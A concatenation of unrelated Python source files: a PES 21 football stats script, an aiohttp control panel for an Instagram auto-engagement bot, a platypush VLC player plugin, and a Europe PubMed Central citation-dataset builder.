assist_updated = player_dict[list_element[0]][1] + list_element[2]
count = player_dict[list_element[0]][2][2] + 1
avg_goals = np.around(goal_updated / count, decimals=2)
avg_assists = np.around(assist_updated / count, decimals=2)
val_updated = {list_element[0]: [
goal_updated, assist_updated, [avg_goals, avg_assists, count]]}
if alph == "AG":
GlobalVariables.AG_PlayerDataDict.update(val_updated)
elif alph == "HM":
GlobalVariables.HM_PlayerDataDict.update(val_updated)
elif alph == "NS":
GlobalVariables.NS_PlayerDataDict.update(val_updated)
else:
GlobalVariables.TZ_PlayerDataDict.update(val_updated)
else:
remaining_lists_dict = {list_element[0]: [
list_element[1], list_element[2], [list_element[1], list_element[2], 1]]}
if alph == "AG":
GlobalVariables.AG_PlayerDataDict.update(remaining_lists_dict)
elif alph == "HM":
GlobalVariables.HM_PlayerDataDict.update(remaining_lists_dict)
elif alph == "NS":
GlobalVariables.NS_PlayerDataDict.update(remaining_lists_dict)
else:
GlobalVariables.TZ_PlayerDataDict.update(remaining_lists_dict)
if player_dict == {}:
remaining_lists_dict = {list_element[0]: [
list_element[1], list_element[2], [list_element[1], list_element[2], 1]]}
if alph == "AG":
GlobalVariables.AG_PlayerDataDict.update(remaining_lists_dict)
elif alph == "HM":
GlobalVariables.HM_PlayerDataDict.update(remaining_lists_dict)
elif alph == "NS":
GlobalVariables.NS_PlayerDataDict.update(remaining_lists_dict)
else:
GlobalVariables.TZ_PlayerDataDict.update(remaining_lists_dict)
# TABULATE PRETTY PRINTING
def tabular_display(table, headers):
print("\n")
print(tabulate(table, headers, tablefmt="pretty"))
# MAIN
def main():
# DISPLAYING TITLE
display_statements_list = ["PES 21 myClub Tour"]
width = len(display_statements_list[0])
colorama.init()
print('+-' + '-' * width + '-+')
for s in display_statements_list:
cprint('| {0:^{1}} |'.format(s, width), color='green')
print('+-' + '-'*(width) + '-+')
# FINDING CORRECT PATH pathDelimiter FOR BAT EXECUTION
try:
os.listdir(GlobalVariables.pathDelimiter+"files")
except FileNotFoundError:
GlobalVariables.pathDelimiter = "./"
# FINDING THE LATEST MODIFIED FILE
GlobalVariables.txtFilename = get_new_file(
GlobalVariables.pathDelimiter+"files/")
if GlobalVariables.txtFilename == '':
raise FileNotFoundError("No file chosen")
# GETTING THE RELEVANT TOUR DICTIONARY
get_working_dict_from_helper_thread = threading.Thread(
target=get_working_dict_from_helper, daemon=False)
get_working_dict_from_helper_thread.start()
# READING FROM THE TXT FILE
every_player_stats = []
single_player_stat = []
try:
if GlobalVariables.tkinterFilePath == "":
openfilepath = GlobalVariables.pathDelimiter+"files/"+GlobalVariables.txtFilename
else:
openfilepath = GlobalVariables.tkinterFilePath
write_to_file(GlobalVariables.tkinterFilePath)
with open(file=openfilepath, mode="r", encoding="utf-8") as working_file:
for line in working_file:
if line.startswith("Player Name"):
continue
else:
line = line.strip().split("\t")
param1 = str(line[0])
param2 = int(line[1])
param3 = int(line[2])
single_player_stat.extend([param1, param2, param3])
every_player_stats.append(list(single_player_stat))
single_player_stat.clear()
except FileNotFoundError:
raise FileNotFoundError("There is no such file in the directory\n")
# FINDING TOTAL GOALS & ASSIST NUMBERS
GlobalVariables.totalGoals = sum_of_goals(every_player_stats)
GlobalVariables.totalAssists = sum_of_assists(every_player_stats)
# STORING ALL OBJECTS
for item in every_player_stats:
GlobalVariables.statObjectsList.append(
PlayerStats(item[0], item[1], item[2]))
# WIKIPEDIA SEARCH THREAD
wiki_search_thread = threading.Thread(target=wiki_search, daemon=False)
print(GlobalVariables.mostValuablePlayerWikiInfo)
wiki_search_thread.start()
# SAVING EVERY PLAYERS TOTAL STATS
analysis_mode = input(
"Turn on player analysis mode? (y/n): ").lower().strip()
if analysis_mode == 'y' or analysis_mode == '':
try:
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ag.json", mode="r", encoding="utf8") as input_json:
try:
player_dict_ag = json.load(input_json)
except:
player_dict_ag = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_hm.json", mode="r", encoding="utf8") as input_json:
try:
player_dict_hm = json.load(input_json)
except:
player_dict_hm = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ns.json", mode="r", encoding="utf8") as input_json:
try:
player_dict_ns = json.load(input_json)
except:
player_dict_ns = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_tz.json", mode="r", encoding="utf8") as input_json:
try:
player_dict_tz = json.load(input_json)
except:
player_dict_tz = {}
except FileNotFoundError:
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ag.json", mode="w+", encoding="utf8"):
player_dict_ag = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_hm.json", mode="w+", encoding="utf8"):
player_dict_hm = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ns.json", mode="w+", encoding="utf8"):
player_dict_ns = {}
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_tz.json", mode="w+", encoding="utf8"):
player_dict_tz = {}
alphabets_P1 = list(map(chr, range(65, 72)))
alphabets_P2 = list(map(chr, range(72, 78)))
alphabets_P3 = list(map(chr, range(78, 84)))
alphabets_P4 = list(map(chr, range(84, 91)))
for i in GlobalVariables.completePlayerStats:
player_name_first_char = i[0][0]
if player_name_first_char in alphabets_P1:
record_player_stats(i, player_dict_ag, "AG")
elif player_name_first_char in alphabets_P2:
record_player_stats(i, player_dict_hm, "HM")
elif player_name_first_char in alphabets_P3:
record_player_stats(i, player_dict_ns, "NS")
elif player_name_first_char in alphabets_P4:
record_player_stats(i, player_dict_tz, "TZ")
else:
print("Unicode error:", player_name_first_char,
"in", i[0]+". Skipping")
pass
player_dict_ag.update(GlobalVariables.AG_PlayerDataDict)
player_dict_hm.update(GlobalVariables.HM_PlayerDataDict)
player_dict_ns .update(GlobalVariables.NS_PlayerDataDict)
player_dict_tz.update(GlobalVariables.TZ_PlayerDataDict)
GlobalVariables.AG_PlayerDataDict.clear()
GlobalVariables.HM_PlayerDataDict.clear()
GlobalVariables.NS_PlayerDataDict.clear()
GlobalVariables.TZ_PlayerDataDict.clear()
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ag.json", mode="w+", encoding="utf8") as output_json:
json.dump(player_dict_ag, output_json, sort_keys=True, indent=4)
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_hm.json", mode="w+", encoding="utf8") as output_json:
json.dump(player_dict_hm, output_json, sort_keys=True, indent=4)
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_ns.json", mode="w+", encoding="utf8") as output_json:
json.dump(player_dict_ns, output_json, sort_keys=True, indent=4)
with open(GlobalVariables.pathDelimiter+"playerdata/player_record_tz.json", mode="w+", encoding="utf8") as output_json:
json.dump(player_dict_tz, output_json, sort_keys=True, indent=4)
# SORTING TABLE
table = GlobalVariables.completePlayerStats
sorting_method = input(
"\nSpecify sorting method (1:Default | 2:Name | 3:Goals | 4:Assist | 5:Percentage involvement): ").lower().strip()
if sorting_method == "1" or sorting_method == '':
pass
elif sorting_method == '2':
table.sort(key=lambda x: x[0], reverse=False)
elif sorting_method == '3':
table.sort(key=lambda x: x[1], reverse=True)
elif sorting_method == '4':
table.sort(key=lambda x: x[2], reverse=True)
elif sorting_method == '5':
table.sort(key=lambda x: x[3], reverse=True)
else:
print("Input not valid. Default sorting selected")
pass
# DISPLAYING THE COMPLETE PLAYER STATS IN A PRETTY TABULAR FORMAT ALONG WITH TOTAL GOALS & ASSISTS
tabular_display(table, ["Name", "Goals", "Assits", "% Involvement"])
print("Total Goals:", GlobalVariables.totalGoals,
"\tTotal Assists:", GlobalVariables.totalAssists)
# DISPLAYING MVP NAME AND SHOWING WINDOWS 10 TOAST
print("\nMVP: ", end='')
try:
cprint(GlobalVariables.mostValuablePlayer, color='green')
except:
print(GlobalVariables.mostValuablePlayer)
try:
n = ToastNotifier()
n.show_toast("PES 21 myCLUB Tour", "Most valuable player is " +
GlobalVariables.mostValuablePlayer, icon_path=GlobalVariables.pathDelimiter+"internal/icons/logo.ico", threaded=True)
except:
pass
# DISPLAYING MVP'S WIKIPEDIA INFO
disp_mvp_info = input("\nDo you want to know about " +
GlobalVariables.mostValuablePlayer+"? (y/n): ").lower().strip()
if disp_mvp_info == 'y' or disp_mvp_info == '':
wiki_search_thread.join()
if GlobalVariables.mostValuablePlayerWikiInfo == "" or GlobalVariables.mostValuablePlayerWikiInfo == "None":
print("\n[Sorry. Wikipedia search was not successful]\n")
else:
print("\n"+str(GlobalVariables.mostValuablePlayerWikiInfo)+"\n")
srch_about_mvp = input("Want to know more (y/n): ").lower().strip()
if srch_about_mvp == 'y':
try:
url = "https://www.google.com.tr/search?q={}".format(
GlobalVariables.mostValuablePlayer)
print("Searching about",
GlobalVariables.mostValuablePlayer+". Opening web-browser")
time.sleep(0.3)
webbrowser.open_new_tab(url)
except:
raise Exception("\nError in opening the webbrowser")
# UPDATING THE WORKING DICTIONARY WITH NEW FILE'S TOTAL GOALS
get_working_dict_from_helper_thread.join()
year_suffix = GlobalVariables.script_helper.get_year_suffix(GlobalVariables.txtFilename)
raw_file_name = GlobalVariables.txtFilename.split(".txt")[0]
updated_key = year_suffix + '-' + \
(GlobalVariables.txtFilename[0:3] + "-" + raw_file_name[3:]).title()
GlobalVariables.tour.update({updated_key: GlobalVariables.totalGoals})
with open(GlobalVariables.pathDelimiter+"internal/"+GlobalVariables.dictFilename+".json", mode="w+", encoding="utf8") as dict_json:
json.dump(GlobalVariables.tour, dict_json, indent=4)
# SHOWING THE GRAPH
graph_show = input("\nSave graphical data? (y/n): ").lower().strip()
if graph_show == 'y' or graph_show == '':
key_lists = []
value_lists = []
for key, value in GlobalVariables.tour.items():
key_lists.append(key)
value_lists.append(value)
x_pos = np.arange(len(key_lists))
y_pos = value_lists
plt.rcdefaults()
plt.bar(x_pos, y_pos, align='center', alpha=0.5)
plt.xticks(x_pos, key_lists)
plt_title = GlobalVariables.script_helper.get_year(GlobalVariables.txtFilename) + " " + GlobalVariables.script_helper.getQuarter(GlobalVariables.txtFilename)
plt.title(plt_title)
plt.ylabel('Number of goals')
plt.xlabel('Tour event')
for i, v in enumerate(y_pos):
plt.text(x=i, y=v+1, s=str(v))
plt_graph_filepath = GlobalVariables.pathDelimiter + "statistics/" + plt_title + ".jpg"
mng = plt.get_current_fig_manager()
mng.window.state("zoomed")
plt.savefig(plt_graph_filepath, format='JPEG')
plt.show()
print("\nGraph saved at", plt_graph_filepath)
print("\nDONE!")
if __name__ == "__main__":
main()
# Code developed by
# https://github.com/gokulmanohar
|
views.py
|
#!venv/bin/python
# -*- coding: utf-8 -*-
import os
import aiohttp_jinja2
import aiohttp
from app.src.instabot import InstaBot
from app.src.stoppable_thread import StoppableThread
from rq import Queue
from app.worker import conn
from threading import Thread
async def index(request):
'''
Render main page template and status message (if exists).
'''
message = await getMessage(request)
context = {'title': 'Main', 'message': message}
return aiohttp_jinja2.render_template('index.html', request, context)
async def login(request):
'''
Collect data from login form, log in and run bot instance in daemon thread.
See https://docs.python.org/3/library/threading.html#thread-objects
'''
data = await request.post()
login = data['login']
password = data['password']
like_per_day = int(data['like_per_day'])
comments_per_day = int(data['comments_per_day'])
follow_per_day = int(data['follow_per_day'])
bot = InstaBot(login=login,
password=password,
like_per_day=like_per_day,
comments_per_day=comments_per_day,
follow_per_day=follow_per_day,
log_mod=2)
# Start separate thread able to receive stop event
'''
t = StoppableThread(target=runBot, args=(bot, ))
t.setDaemon(True)
t.start()
'''
q = Queue(connection=conn)
q.enqueue(runBot, bot)
# Store pointers to thread and bot in app instance
request.app['queue'] = q
request.app['bot'] = bot
return aiohttp.web.HTTPFound('/mybot')
async def mybot(request):
'''
Render bot page template.
'''
context = {'title': 'Bot control panel'}
return aiohttp_jinja2.render_template('mybot.html', request, context)
async def show_log(request):
'''
Receive data from submit buttons and either stop bot or show it's log.
'''
data = await request.post()
# Get bot instance
bot = await getBot(request)
q = await getQueue(request)
# Check data from submit button
if bot and 'refresh' in data.keys():
# Fetch log data from bot instance and re-render page
context = {'title': 'Bot control panel', 'log': bot.log_full_text}
return aiohttp_jinja2.render_template('mybot.html', request, context)
elif bot and 'logout' in data.keys():
# Schedule logout event and go to main page
q.enqueue(bot.logout())
q.enqueue(exit(0))
request.app['message'] = 'Bot is stopped'
return aiohttp.web.HTTPFound('/')
else:
# Other cases handling
request.app['message'] = 'Your are not authorized'
return aiohttp.web.HTTPFound('/')
async def getMessage(request):
message = request.app['message']
return message
async def getBot(request):
bot = request.app['bot']
return bot
async def getQueue(request):
q = request.app['queue']
return q
def runBot(bot):
'''
Function to run bot in auto-mod
'''
bot.new_auto_mod()
|
__init__.py
|
import os
import threading
import urllib.parse
from typing import Optional
from platypush.context import get_bus
from platypush.plugins.media import PlayerState, MediaPlugin
from platypush.message.event.media import MediaPlayEvent, MediaPlayRequestEvent, \
MediaPauseEvent, MediaStopEvent, MediaSeekEvent, MediaVolumeChangedEvent, \
MediaMuteChangedEvent, NewPlayingMediaEvent
from platypush.plugins import action
class MediaVlcPlugin(MediaPlugin):
"""
Plugin to control vlc instances
Requires:
* **python-vlc** (``pip install python-vlc``)
* **vlc** executable on your system
"""
def __init__(self, args=None, fullscreen=False, volume=100, *argv, **kwargs):
"""
Create the vlc wrapper.
:param args: List of extra arguments to pass to the VLC executable (e.g.
``['--sub-language=en', '--snapshot-path=/mnt/snapshots']``)
:type args: list[str]
:param fullscreen: Set to True if you want media files to be opened in
fullscreen by default (can be overridden by `.play()`) (default: False)
:type fullscreen: bool
:param volume: Default media volume (default: 100)
:type volume: int
"""
super().__init__(*argv, **kwargs)
self._args = args or []
self._instance = None
self._player = None
self._latest_seek = None
self._default_fullscreen = fullscreen
self._default_volume = volume
self._on_stop_callbacks = []
self._title = None
self._filename = None
self._monitor_thread: Optional[threading.Thread] = None
self._on_stop_event = threading.Event()
self._stop_lock = threading.RLock()
@classmethod
def _watched_event_types(cls):
import vlc
return [getattr(vlc.EventType, evt) for evt in [
'MediaPlayerLengthChanged', 'MediaPlayerMediaChanged',
'MediaDurationChanged', 'MediaPlayerMuted',
'MediaPlayerUnmuted', 'MediaPlayerOpening', 'MediaPlayerPaused',
'MediaPlayerPlaying', 'MediaPlayerPositionChanged',
'MediaPlayerStopped', 'MediaPlayerTimeChanged', 'MediaStateChanged',
'MediaPlayerForward', 'MediaPlayerBackward',
'MediaPlayerEndReached', 'MediaPlayerTitleChanged',
'MediaPlayerAudioVolume',
] if hasattr(vlc.EventType, evt)]
def _init_vlc(self, resource):
import vlc
if self._instance:
self.logger.info('Another instance is running, waiting for it to terminate')
self._on_stop_event.wait()
self._reset_state()
for k, v in self._env.items():
os.environ[k] = v
self._monitor_thread = threading.Thread(target=self._player_monitor)
self._monitor_thread.start()
self._instance = vlc.Instance(*self._args)
self._player = self._instance.media_player_new(resource)
for evt in self._watched_event_types():
self._player.event_manager().event_attach(
eventtype=evt, callback=self._event_callback())
def _player_monitor(self):
self._on_stop_event.wait()
self.logger.info('VLC stream terminated')
self._reset_state()
def _reset_state(self):
with self._stop_lock:
self._latest_seek = None
self._title = None
self._filename = None
self._on_stop_event.clear()
if self._player:
self.logger.info('Releasing VLC player resource')
self._player.release()
self._player = None
if self._instance:
self.logger.info('Releasing VLC instance resource')
self._instance.release()
self._instance = None
@staticmethod
def _post_event(evt_type, **evt):
bus = get_bus()
bus.post(evt_type(player='local', plugin='media.vlc', **evt))
def _event_callback(self):
def callback(event):
from vlc import EventType
self.logger.debug('Received vlc event: {}'.format(event))
if event.type == EventType.MediaPlayerPlaying:
self._post_event(MediaPlayEvent, resource=self._get_current_resource())
elif event.type == EventType.MediaPlayerPaused:
self._post_event(MediaPauseEvent)
elif event.type == EventType.MediaPlayerStopped or \
event.type == EventType.MediaPlayerEndReached:
self._on_stop_event.set()
self._post_event(MediaStopEvent)
for cbk in self._on_stop_callbacks:
cbk()
elif (
event.type == EventType.MediaPlayerTitleChanged or
event.type == EventType.MediaPlayerMediaChanged
):
self._title = self._player.get_title() or self._filename
if event.type == EventType.MediaPlayerMediaChanged:
self._post_event(NewPlayingMediaEvent, resource=self._title)
elif event.type == EventType.MediaPlayerLengthChanged:
self._post_event(NewPlayingMediaEvent, resource=self._get_current_resource())
elif event.type == EventType.MediaPlayerTimeChanged:
pos = float(self._player.get_time()/1000)
if self._latest_seek is None or \
abs(pos-self._latest_seek) > 5:
self._post_event(MediaSeekEvent, position=pos)
self._latest_seek = pos
elif event.type == EventType.MediaPlayerAudioVolume:
self._post_event(MediaVolumeChangedEvent, volume=self._player.audio_get_volume())
elif event.type == EventType.MediaPlayerMuted:
self._post_event(MediaMuteChangedEvent, mute=True)
elif event.type == EventType.MediaPlayerUnmuted:
self._post_event(MediaMuteChangedEvent, mute=False)
return callback
@action
def play(self, resource=None, subtitles=None, fullscreen=None, volume=None):
"""
Play a resource.
:param resource: Resource to play - can be a local file or a remote URL (default: None == toggle play).
:type resource: str
:param subtitles: Path to optional subtitle file
:type subtitles: str
:param fullscreen: Set to explicitly enable/disable fullscreen (default:
`fullscreen` configured value or False)
:type fullscreen: bool
:param volume: Set to explicitly set the playback volume (default:
`volume` configured value or 100)
:type fullscreen: bool
"""
if not resource:
return self.pause()
self._post_event(MediaPlayRequestEvent, resource=resource)
resource = self._get_resource(resource)
if resource.startswith('file://'):
resource = resource[len('file://'):]
self._filename = resource
self._init_vlc(resource)
if subtitles:
if subtitles.startswith('file://'):
subtitles = subtitles[len('file://'):]
self._player.video_set_subtitle_file(subtitles)
self._player.play()
if self.volume:
self.set_volume(volume=self.volume)
if fullscreen or self._default_fullscreen:
self.set_fullscreen(True)
if volume is not None or self._default_volume is not None:
self.set_volume(volume if volume is not None
else self._default_volume)
return self.status()
@action
def pause(self):
""" Toggle the paused state """
if not self._player:
return None, 'No vlc instance is running'
if not self._player.can_pause():
return None, 'The specified media type cannot be paused'
self._player.pause()
return self.status()
@action
def quit(self):
""" Quit the player (same as `stop`) """
with self._stop_lock:
if not self._player:
return None, 'No vlc instance is running'
self._player.stop()
self._on_stop_event.wait(timeout=5)
self._reset_state()
return self.status()
@action
def stop(self):
""" Stop the application (same as `quit`) """
return self.quit()
@action
def voldown(self, step=10.0):
""" Volume down by (default: 10)% """
if not self._player:
return None, 'No vlc instance is running'
return self.set_volume(int(max(0, self._player.audio_get_volume()-step)))
@action
def volup(self, step=10.0):
""" Volume up by (default: 10)% """
if not self._player:
return None, 'No vlc instance is running'
return self.set_volume(int(min(100, self._player.audio_get_volume()+step)))
@action
def set_volume(self, volume):
"""
Set the volume
:param volume: Volume value between 0 and 100
:type volume: float
"""
if not self._player:
return None, 'No vlc instance is running'
volume = max(0, min([100, volume]))
self._player.audio_set_volume(volume)
status = self.status().output
status['volume'] = volume
return status
@action
def seek(self, position):
"""
Seek backward/forward by the specified number of seconds
:param position: Number of seconds relative to the current cursor
:type position: int
"""
if not self._player:
return None, 'No vlc instance is running'
if not self._player.is_seekable():
return None, 'The resource is not seekable'
media = self._player.get_media()
if not media:
return None, 'No media loaded'
pos = min(media.get_duration()/1000, max(0, position))
self._player.set_time(int(pos*1000))
return self.status()
@action
def back(self, offset=30.0):
""" Back by (default: 30) seconds """
if not self._player:
return None, 'No vlc instance is running'
media = self._player.get_media()
if not media:
return None, 'No media loaded'
pos = max(0, (self._player.get_time()/1000)-offset)
return self.seek(pos)
@action
def forward(self, offset=30.0):
""" Forward by (default: 30) seconds """
if not self._player:
return None, 'No vlc instance is running'
media = self._player.get_media()
if not media:
return None, 'No media loaded'
pos = min(media.get_duration()/1000, (self._player.get_time()/1000)+offset)
return self.seek(pos)
@action
def toggle_subtitles(self, visibile=None):
""" Toggle the subtitles visibility """
if not self._player:
return None, 'No vlc instance is running'
if self._player.video_get_spu_count() == 0:
return None, 'The media file has no subtitles set'
if self._player.video_get_spu() is None or \
self._player.video_get_spu() == -1:
self._player.video_set_spu(0)
else:
self._player.video_set_spu(-1)
@action
def toggle_fullscreen(self):
""" Toggle the fullscreen mode """
if not self._player:
return None, 'No vlc instance is running'
self._player.toggle_fullscreen()
@action
def set_fullscreen(self, fullscreen=True):
""" Set fullscreen mode """
if not self._player:
return None, 'No vlc instance is running'
self._player.set_fullscreen(fullscreen)
@action
def set_subtitles(self, filename, **args):
""" Sets media subtitles from filename """
if not self._player:
return None, 'No vlc instance is running'
if filename.startswith('file://'):
filename = filename[len('file://'):]
self._player.video_set_subtitle_file(filename)
@action
def remove_subtitles(self):
""" Removes (hides) the subtitles """
if not self._player:
return None, 'No vlc instance is running'
self._player.video_set_spu(-1)
@action
def is_playing(self):
"""
:returns: True if it's playing, False otherwise
"""
if not self._player:
return False
return self._player.is_playing()
@action
def load(self, resource, **args):
"""
Load/queue a resource/video to the player
"""
if not self._player:
return self.play(resource, **args)
self._player.set_media(resource)
return self.status()
@action
def mute(self):
""" Toggle mute state """
if not self._player:
return None, 'No vlc instance is running'
self._player.audio_toggle_mute()
@action
def set_position(self, position):
"""
Seek backward/forward to the specified absolute position (same as ``seek``)
"""
return self.seek(position)
@action
def status(self):
"""
Get the current player state.
:returns: A dictionary containing the current state.
Example::
output = {
"filename": "filename or stream URL",
"state": "play" # or "stop" or "pause"
}
"""
import vlc
with self._stop_lock:
if not self._player:
return {'state': PlayerState.STOP.value}
status = {}
vlc_state = self._player.get_state()
if vlc_state == vlc.State.Playing:
status['state'] = PlayerState.PLAY.value
elif vlc_state == vlc.State.Paused:
status['state'] = PlayerState.PAUSE.value
else:
status['state'] = PlayerState.STOP.value
status['url'] = urllib.parse.unquote(self._player.get_media().get_mrl()) if self._player.get_media() else None
status['position'] = float(self._player.get_time()/1000) if self._player.get_time() is not None else None
media = self._player.get_media()
status['duration'] = media.get_duration()/1000 if media and media.get_duration() is not None else None
status['seekable'] = status['duration'] is not None
status['fullscreen'] = self._player.get_fullscreen()
status['mute'] = self._player.audio_get_mute()
status['path'] = status['url']
status['pause'] = status['state'] == PlayerState.PAUSE.value
status['percent_pos'] = self._player.get_position()*100
status['filename'] = self._filename
status['title'] = self._title
status['volume'] = self._player.audio_get_volume()
status['volume_max'] = 100
return status
def on_stop(self, callback):
self._on_stop_callbacks.append(callback)
def _get_current_resource(self):
if not self._player or not self._player.get_media():
return
return self._player.get_media().get_mrl()
# vim:sw=4:ts=4:et:
|
EuropePubMedCentralDataset.py
|
from os import listdir, system, remove
from os.path import isfile, join
import re
import multiprocessing
from urllib.parse import unquote
import json
from lxml import etree
import pandas as pd
import tqdm
import time
import httplib2
from bs4 import BeautifulSoup, SoupStrainer
import wget
from multiprocessing.pool import ThreadPool
import os
import uuid
from queue import Queue
from typing import Optional
import csv
from threading import Thread
import pickle
from config import *
__author__ = "Gabriele Pisciotta"
class EuropePubMedCentralDataset:
def __init__(self,
start_path,
writing_multiple_csv,
skip_download,
download_workers,
unzip_threads,
process_article_threads,
max_file_to_download):
self.pubmed_file_path = start_path
self.skip_download = skip_download
self.download_workers = download_workers
self.unzip_threads = unzip_threads
self.process_article_threads = process_article_threads
self.max_file_to_download = max_file_to_download
self.pubmed_dump_file_path = join(self.pubmed_file_path, 'dump')
self.articles_path = join(self.pubmed_file_path, 'articles')
self.csv_file_path = join(self.pubmed_file_path, 'csv')
self.folder_articles = folder_articles
# We can both exploit a queue in order to write into a single dataset.csv
# or to save multiple csv and then concatenate them into the final dataset
self.writing_multiple_csv = writing_multiple_csv
if not self.writing_multiple_csv:
self.queue = Queue()
os.makedirs(self.articles_path, exist_ok=True)
os.makedirs(self.csv_file_path, exist_ok=True)
os.makedirs(self.pubmed_dump_file_path, exist_ok=True)
def start(self):
if not self.skip_download:
# for each file from the pubmed dump
f = self._get_files_in_dir(self.pubmed_dump_file_path)
# load local index of already downloaded dump and add to the list of already downloaded file
if os.path.isfile(join(self.pubmed_file_path, 'downloaded-dump.txt')):
with open(join(self.pubmed_file_path, 'downloaded-dump.txt'), 'r') as index_file:
f.append(index_file.readline().replace("\n",""))
# get the difference between files to download and files that we have
links = self.get_links_from_pubmed()
if len(links) > 0:
todownload = list(set(links).difference(set(f)))
if self.max_file_to_download != None:
todownload = todownload[:int(self.max_file_to_download)]
if len(todownload):
print("\nDownloading {} OA dumps from EuropePubMedCentral".format(len(todownload)))
with multiprocessing.Pool(self.download_workers) as pool:
pool.map(worker_download_links, ((d, self.pubmed_dump_file_path) for d in todownload))
else:
print("No link to download!")
# Update the file list
f = self._get_files_in_dir(self.pubmed_dump_file_path)
# Unzip all the files
if len(f) > 0:
print("\nUnzipping all the articles")
s = time.time()
with ThreadPool(self.unzip_threads) as pool:
list(tqdm.tqdm(pool.imap(self.worker_unzip_files, f), total=len(f)))
e = time.time()
print("\nTime: {}".format((e - s)))
# process each article
f = self._get_articles_in_dir(self.articles_path)
if len(f) > 0:
self.load_PMC_ids()
s = time.time()
print("\nProcessing the articles")
self.process_articles(f)
e = time.time()
print("\nTime: {}".format((e - s)))
self._concatenate_datasets(self.csv_file_path)
def load_PMC_ids(self):
# Download articles' IDs --
if not os.path.isfile(join(self.pubmed_file_path, 'PMC-ids.csv.gz')):
print("\nDownloading PMC's IDs dataset")
wget.download('http://ftp.ncbi.nlm.nih.gov/pub/pmc/PMC-ids.csv.gz', self.pubmed_file_path)
# Pickle a dictionary of the dataframe containing only the keys that we care about
if not os.path.isfile(join(self.pubmed_file_path, 'PMC-ids.pkl')):
# Read the dataset and create a single big dict having all the needed keys for entity resolution
articleids = pd.read_csv(join(self.pubmed_file_path, 'PMC-ids.csv.gz'), usecols=['PMCID', 'PMID', 'DOI'],
low_memory=True)
articleids = articleids.drop_duplicates()
view = articleids[articleids['PMID'].notna()]
view['PMID'] = view['PMID'].astype(int)
view_clean = view.drop_duplicates(subset='PMID', keep="last")
dataset = view_clean.set_index('PMID').to_dict('index')
del view
view = articleids[articleids['PMCID'].notna()]
view['PMID'] = view['PMID'].astype('Int64')
del articleids
view_clean = view.drop_duplicates(subset='PMCID', keep="last")
self.articleids = {**dataset, **view_clean.set_index('PMCID').to_dict('index')}
del view
pickle.dump(obj=self.articleids, file=open(join(self.pubmed_file_path, 'PMC-ids.pkl'), 'wb'))
else:
print("Loading PMC IDs from pickled dict")
self.articleids = pickle.load(open(join(self.pubmed_file_path, 'PMC-ids.pkl'), 'rb'))
def write_to_csv(self):
keys = ['cur_doi', 'cur_pmid', 'cur_pmcid', 'cur_name', 'references']
while True:
if not self.queue.empty():
row = self.queue.get()
if row == "STOP":
return
else:
row = [v for k, v in row.items()]
if not os.path.isfile(join(self.csv_file_path, "dataset.csv")):
with open(join(self.csv_file_path, "dataset.csv"), 'w', newline='') as output_file:
dict_writer = csv.writer(output_file, delimiter='\t')
dict_writer.writerow(keys)
dict_writer.writerow(row)
else:
with open(join(self.csv_file_path, "dataset.csv"), 'a', newline='') as output_file:
dict_writer = csv.writer(output_file, delimiter='\t')
dict_writer.writerow(row)
def worker_article(self, f: str) -> None:
# Use the extracted file
with open(f, 'r') as fi:
filename = f.split(os.sep)[-1]
try:
cur_xml = etree.parse(fi)
except Exception as e:
print(e)
os.makedirs(join(self.articles_path, 'exceptions'), exist_ok=True)
with open(join(self.articles_path, 'exceptions', filename), 'w') as fout:
for line in fi:
fout.write(line)
os.remove(f)
return
cur_pmid = self.get_id_from_xml_source(cur_xml, 'pmid')
cur_pmcid = self.get_id_from_xml_source(cur_xml, 'pmcid')
if cur_pmcid is not None and not cur_pmcid.startswith("PMC"):
cur_pmcid = "PMC{}".format(cur_pmcid)
cur_doi = self.normalise_doi(self.get_id_from_xml_source(cur_xml, 'doi'))
# If we have no identifier, stop the processing of the article
if cur_pmid is None and cur_pmcid is None and cur_doi is None:
os.makedirs(join(self.articles_path, 'without-id'), exist_ok=True)
with open(join(self.articles_path, 'without-id', filename), 'w') as fout:
with open(f, 'r') as fi:
for line in fi:
fout.write(line)
os.remove(f)
return
try:
# Extract missing metadata from the ID dataset
if cur_pmid is None or cur_pmcid is None or cur_doi is None:
row = None
if cur_pmid is not None and self.articleids.__contains__(int(cur_pmid)):
row = self.articleids[int(cur_pmid)]
elif cur_pmcid is not None and self.articleids.__contains__(cur_pmcid):
row = self.articleids[cur_pmcid]
if row is not None and len(row):
if cur_pmid is None and row['PMID'] is not None and not pd.isna(row['PMID']):
cur_pmid = row['PMID']
if cur_pmcid is None and row['PMCID'] is not None:
cur_pmcid = row['PMCID']
if cur_doi is None and row['DOI'] is not None:
cur_doi = self.normalise_doi(str(row['DOI']))
references = cur_xml.xpath(".//ref-list/ref")
references_list = []
if len(references):
for reference in references:
entry_text = self.create_entry_xml(reference)
ref_pmid = None
ref_doi = None
ref_pmcid = None
ref_url = None
ref_xmlid_attr = reference.get('id')
if len(ref_xmlid_attr):
ref_xmlid = ref_xmlid_attr
if ref_xmlid == "":
ref_xmlid = None
ref_pmid_el = reference.xpath(".//pub-id[@pub-id-type='pmid']")
if len(ref_pmid_el):
ref_pmid = etree.tostring(
ref_pmid_el[0], method="text", encoding='unicode').strip()
ref_doi_el = reference.xpath(".//pub-id[@pub-id-type='doi']")
if len(ref_doi_el):
ref_doi = self.normalise_doi(etree.tostring(
ref_doi_el[0], method="text", encoding='unicode').lower().strip())
if ref_doi == "":
ref_doi = None
ref_pmcid_el = reference.xpath(".//pub-id[@pub-id-type='pmcid']")
if len(ref_pmcid_el):
ref_pmcid = etree.tostring(
ref_pmcid_el[0], method="text", encoding='unicode').strip()
if ref_pmcid == "":
ref_pmcid = None
elif not ref_pmcid.startswith("PMC"):
ref_pmcid = "PMC{}".format(ref_pmcid)
ref_url_el = reference.xpath(".//ext-link")
if len(ref_url_el):
ref_url = etree.tostring(
ref_url_el[0], method="text", encoding='unicode').strip()
if not ref_url.startswith("http"):
ref_url = None
# Extract missing metadata from the ID dataset
if ref_pmid is None or ref_pmcid is None or ref_doi is None:
row = None
